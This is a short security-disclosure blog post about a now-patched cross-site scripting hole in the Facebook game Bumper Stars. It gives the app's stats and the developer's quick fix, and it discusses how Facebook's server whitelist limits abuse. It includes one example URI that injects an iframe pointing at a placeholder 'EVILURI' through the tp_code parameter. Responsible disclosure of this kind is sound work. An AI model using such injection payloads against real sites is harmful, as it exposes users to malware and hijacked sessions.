FAXX Hack: Bumper Stars

Facebook Verified Application

Current Monthly Active Users: 55,431

Current Rank on Application Leaderboard: 659

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bumperstars/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Notes: You’ll notice the example URI only inserts an iframe, rather than attempting the sort of double-injection of previous examples. Bumper Stars, and two other Large Animal Games applications that will be posted soon, use Facebook’s server whitelist feature for API requests. This means that trying to use injected JavaScript to make API calls will fail, as they originate from the user’s computer and not LAG’s servers. One could still have used the XSS hole to launch a malware attack, but using the whitelist prevents stealing profile information or launching a viral attack via notifications and feed stories.

Bumper Stars was the first application I’ve encountered that made use of the server whitelist feature, and I commend LAG for that step. But while the feature can prevent many of the attacks I’ve outlined, it is not practical for every application. Many other developers make use of the JavaScript API for legitimate calls, and these would fail if the developer enabled a server whitelist.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Share with your friends!
  • Facebook
  • Twitter
  • Google Plus
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Comments are closed.